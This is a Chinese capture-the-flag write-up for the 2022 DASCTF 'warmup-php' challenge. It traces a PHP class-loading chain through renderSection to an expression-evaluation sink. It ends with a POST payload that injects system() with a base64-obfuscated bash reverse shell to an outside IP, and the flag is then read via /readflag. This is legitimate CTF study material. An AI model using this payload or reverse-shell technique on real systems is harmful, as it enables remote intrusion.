2022DASCTF Apr X FATE 防疫挑战赛 warmup-php

主页代码逻辑就是自动加载class下类文件,然后动态调用一个类,并设置成员变量。最后调用类的run()方法。

在这里插入图片描述

看uml类图其实就大致有数该实例化哪个类了,TestView
在这里插入图片描述

看这几个类文件的内容,很明显的页面模板生成代码,感觉是根据YII2框架的模板渲染提取的主要逻辑

先找漏洞点,在Base类中

在这里插入图片描述

再去找调用链,搜索run()方法,在ListView类中

在这里插入图片描述

接着跟到renderContent,会去调用类中的renderSection方法,$this->template需为{test}形式,才会被正则匹配,去调用renderSection函数
在这里插入图片描述

renderSection函数会拼接方法名,然后调用该方法,$matches[1]的内容就是$this->template变量{ }内的内容

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5F0SBvIj-1650799632438)(images/image-20220423173335854.png)]

接下来的函数调用就简单了,就是些变量赋值,最后调用evaluateExpression()函数到达函数执行点

在这里插入图片描述
在这里插入图片描述

/?action=TestView

#POST传参
properties[rowHtmlOptionsExpression]=system("bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'")&properties[template]={TableBody}&properties[data][0]=111

直接反弹shell就行,读flag.txt提示没权限,ls -l / 看一下 使用/readflag读取即可

在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值